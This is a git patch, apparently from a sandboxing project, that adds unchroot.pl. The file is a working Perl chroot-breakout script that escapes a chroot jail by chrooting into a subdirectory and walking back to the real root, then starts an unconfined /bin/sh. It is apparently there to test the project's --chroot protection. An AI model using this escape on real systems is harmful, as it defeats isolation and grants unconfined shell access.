From 1cb8ef59101eeaa1b325fb7f881ded148b0de1d3 Mon Sep 17 00:00:00 2001
From: netblue30 <netblue30@yahoo.com>
Date: Sat, 31 Oct 2015 13:07:38 -0400
Subject: --chroot testing

---
 src/tools/unchroot.pl | 33 +++++++++++++++++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100755 src/tools/unchroot.pl

(limited to 'src/tools/unchroot.pl')

diff --git a/src/tools/unchroot.pl b/src/tools/unchroot.pl
new file mode 100755
index 000000000..bd30ffe76
--- /dev/null
+++ b/src/tools/unchroot.pl
@@ -0,0 +1,33 @@
+#!/usr/bin/perl -w
+use strict;
+# unchroot.pl Dec 2007
+# http://pentestmonkey.net/blog/chroot-breakout-perl
+
+# This script may be used for legal purposes only.
+
+# Go to the root of the jail
+chdir "/";
+
+# Open filehandle to root of jail
+opendir JAILROOT, "." or die "ERROR: Couldn't get file handle to root of jailn";
+
+# Create a subdir, move into it
+mkdir "mysubdir";
+chdir "mysubdir";
+
+# Lock ourselves in a new jail
+chroot ".";
+
+# Use our filehandle to get back to the root of the old jail
+chdir(*JAILROOT);
+
+# Get to the real root
+while ((stat("."))[0] != (stat(".."))[0] or (stat("."))[1] != (stat(".."))[1]) {
+        chdir "..";
+}
+
+# Lock ourselves in real root - so we're not really in a jail at all now
+chroot ".";
+
+# Start an un-jailed shell
+system("/bin/sh");
-- 
cgit v1.2.3-54-g00ecf